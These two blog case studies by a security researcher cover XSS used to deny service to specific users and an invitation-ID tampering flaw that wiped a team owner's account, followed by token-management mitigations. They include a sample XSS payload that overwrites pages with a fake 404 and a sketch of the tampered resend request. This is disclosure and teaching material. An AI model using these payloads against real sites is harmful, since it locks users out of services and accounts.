DoS: Back From The Dead?


Happy 2018!

January is the perfect post-holiday time to lay out our goals for the coming year. And to lose some of that holiday weight, of course!
FogMarks always aims to write the most interesting case-studies about the latest “hot” vulnerabilities, and 2018 is going to be super-exciting!

So, finally, after a long break, here we are again, discussing a vulnerability that many thought was dead: the Denial of Service attack.
I’ve heard a lot of statements in the sec community regarding DoS attacks and vulnerabilities. Most of them dismissed DoS as “an attack of the past” – a vulnerability that can no longer affect the server side, thanks to companies such as Cloudflare, Nexusguard and other load-balancing service providers.

As a result, a lot of bug bounty programs don’t accept DoS vulnerability submissions, and sometimes even forbid the researcher from testing at all, fearing an effect on the system’s stability and user experience. And they’re right, sort of.

But who said that a DoS attack has to target the server? It takes two to tango – if the server is now “protected” against DoS attacks (by an anti-DoS/DDoS service), who is protecting the user?

Let me elaborate on that: companies are so busy preventing DoS attacks on their servers that they forget DoS attacks are possible against users as well. A Denial of Service attack, by my definition, is any attack that prevents a user from accessing a resource or a service on the server. This can be done by attacking the server directly – for example, trying to make it shut down under excess traffic – or by attacking the users directly.

Actually, attacking the users is the easier way to do it. In addition, in a lot of cases the company won’t even know that a user was attacked until that user contacts the company and says, “Hey, I cannot access X”.

You all know what I’m about to say now. Which type of vulnerability can deny service to a specific user almost instantly? An XSS, of course!

Sending or planting an XSS payload that disrupts a certain service for a specific user or group of users causes a severe denial of that service or resource. The payload can be a simple redirection out of the site, or even a document.write() call that simply prints a blank page or a misleading one.
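To make this concrete, here is a minimal sketch of what such a payload could look like (the wording and markup are mine, for illustration only – not taken from any real target):

```typescript
// Sketch of a DoS-style XSS payload (hypothetical markup, for illustration only).
// Once it executes in the victim's browser, it replaces the whole page with a fake
// error, effectively denying the user access to the service.
function denyService(): void {
  document.open();
  document.write(
    "<html><head><title>404 Not Found</title></head>" +
    "<body><h1>404 Not Found</h1><p>The requested resource is unavailable.</p></body></html>"
  );
  document.close();
}

// Alternative: simply redirect the victim away from the site.
function redirectAway(): void {
  window.location.href = "https://example.org/";
}

denyService();
```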

A certain very well-known commercial company, which hasn’t yet allowed us to mention its name, suffered from that exact attack.
When I first started researching their main product, I was told not to DoS or DDoS their servers, “because we have anti-DDoS mechanisms preventing that, and we think DoS attacks belong to the past”. Naturally, DoS from a different angle was the next thing I tried on their product 🙂

I came to understand that an XSS payload could be sent directly to a specific user or to a group of users. That XSS was “universal” – it executed on every page of the site, because the messaging feature appeared on every page. I planted an XSS payload that simply echoed a mock “404 Not Found” page over the real one. To prove that this issue was indeed severe, the head of their security response team and I tested the attack on the production site against one of the developers. His response (“WTF? What happened to the site?”) was hilarious.

Conclusion
Although most modern servers are now well protected against DoS and DDoS attacks thanks to smart load balancing and malicious-request blocking services, the user is still out there – unarmed and unprotected. You should always treat any attack that can prevent an action from being fulfilled as a major security issue, regardless of the type of vulnerability behind it.

Happy & Successful 2018!

And The King Goes Down


Tokens are great. Well, sometimes.

Today’s case-study will discuss the importance of token-management software.
Well, every site that allows login will normally use a token for each of the ‘critical’ actions it lets users perform. Facebook, for example, automatically adds a token to the end of any link a user provides – and even to their own links! This mechanism is called ‘Linkshim’, and it is the primary reason you never hear about Facebook open redirects, CSRFs or clickjacking (yeah, yeah, I know they also simply don’t allow iframes to access them; I’ll write a whole case-study about that in the near future).
Facebook’s method is pretty simple – if a link is added to the page, append a token to the end of it. The token, of course, should only allow the same logged-in user to access the URL, and a usage count should restrict the number of times the token can be used (hint: only once).
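Here is a minimal sketch of that idea – a per-user token appended to every outbound link and checked by a redirector. The helper names, secret and endpoint are my own assumptions, not Facebook’s actual Linkshim implementation:

```typescript
import { createHmac } from "crypto";

// Hypothetical server-side secret; in practice this would live in secure config.
const LINK_SECRET = "server-side-secret";

// Derive a token that is only valid for this user and this destination URL.
function linkToken(userId: string, url: string): string {
  return createHmac("sha256", LINK_SECRET).update(`${userId}|${url}`).digest("hex");
}

// Rewrite an outbound link so it goes through a redirector that checks the token.
function wrapLink(userId: string, url: string): string {
  const token = linkToken(userId, url);
  return `/l.php?u=${encodeURIComponent(url)}&h=${token}`;
}

// The redirector follows the link only if the token matches the logged-in user.
function isValidLink(userId: string, url: string, token: string): boolean {
  return linkToken(userId, url) === token;
}
```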

But what happens when tokens are managed the wrong way?

A very famous security company, which still hasn’t allowed us to publish its name, allowed users to create a team. When a user creates a team, he is the owner of the team – he has the ‘highest’ role, and he basically controls all of the team’s actions and options: he can change the team’s name, invite new people to the team, change the roles of people in the team, and so on.

The team offers the following roles: Owner, Administrator and some other minor, non-important roles. Only the owner and administrators of the team are able to invite new users to the team. An invitation can be sent only to a person who is not on the team and does not have an account on the company’s site. When the receiver opens the mail, he is redirected to the company’s registration page and is then added to the team with the role the Owner/Admin set.

When I first looked at the team options I noticed that, after the owner or an admin invites other people to the team via email, he can resend the invitation in case the invited user missed it or deleted it by accident. The resend option was a link next to each invitation. Clicking the link issued a POST request to a certain ‘invitation manager’ page and passed it the invitation ID.

That’s where I started thinking. Why pass the invitation ID as is? Why not obfuscate it, or at least use a token for some sort of validation?

Well, that’s where the gold is, baby. Past invitation IDs were not deleted. That means that invitations that had already been approved were still present in the database, and still accessible.

By changing the passed invitation ID parameter to the owner’s ‘first’ invitation ID, it was possible to resend an invitation to him.
At first I laughed and said, ‘Oh well, how much damage could it do besides spamming the owner a bit?’ But I was wrong. Very wrong.
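To illustrate the kind of request involved, here is a rough sketch of the tampered resend call. The endpoint, parameter name and domain are my guesses, not the company’s real API:

```typescript
// Rough sketch of the tampered resend request (endpoint and parameter names are hypothetical).
// The only thing the attacker changes is the invitation ID: there is no token,
// and the server never checks whether this invitation belongs to the attacker's team.
async function resendInvitation(invitationId: number): Promise<void> {
  await fetch("https://vulnerable.example/invitation-manager/resend", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: `invitation_id=${invitationId}`,
    credentials: "include", // the attacker's own session cookie is enough
  });
}

// Resending invitation ID 1 -- the team owner's original invitation.
resendInvitation(1);
```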

When the system detected that an invitation to the owner had been sent, it removed the owner from his role. But furthermore – remember I said that sending an invitation directs the receiver to a registration page based on his email address? The system also wiped the owner’s account – his private details and, most importantly, his credentials. This left the owner’s entire account locked out. A classic DoS.

So how can we prevent unwanted actions from being performed on our server? That’s kind of easy.
First, let’s attach an authenticity token to each action. The authenticity token must be generated specifically and individually for each specific user.
Second, like milk and cheese, let’s attach an expiration date to the token. A two-minute expiration is a fair window for the token to be used by the user.
And last, let’s delete used tokens from the accessible-tokens mechanism. A token should be used only once. If a user has a problem with that, generate a few tokens for him. A minimal sketch of these three rules follows below.
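Here is that sketch – a single-use, per-user, expiring action-token manager. The names and the in-memory storage are my own choices for illustration; a real deployment would back this with a shared store:

```typescript
import { randomBytes } from "crypto";

// Rule 2: tokens expire after two minutes.
const TOKEN_TTL_MS = 2 * 60 * 1000;

interface TokenRecord {
  userId: string;
  action: string;
  expiresAt: number;
}

// In-memory store for illustration only (a real service would use e.g. Redis).
const tokens = new Map<string, TokenRecord>();

// Rule 1: a token is generated individually for a specific user and a specific action.
function issueToken(userId: string, action: string): string {
  const token = randomBytes(32).toString("hex");
  tokens.set(token, { userId, action, expiresAt: Date.now() + TOKEN_TTL_MS });
  return token;
}

// Rule 3: a token is deleted as soon as it is consumed, so it can only be used once.
function consumeToken(token: string, userId: string, action: string): boolean {
  const record = tokens.get(token);
  if (!record) return false;                        // unknown or already-used token
  tokens.delete(token);                             // single use: remove immediately
  if (Date.now() > record.expiresAt) return false;  // expired
  return record.userId === userId && record.action === action;
}
```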

In conclusion,
this case-study presented a severe security issue that was discovered in the code of a very famous security company.
The security issue could have been prevented by following three simple principles: 1) attaching a token to each action a user performs; 2) setting a rational expiration time for each token; 3) and, most importantly, correctly managing the tokens and deleting used ones.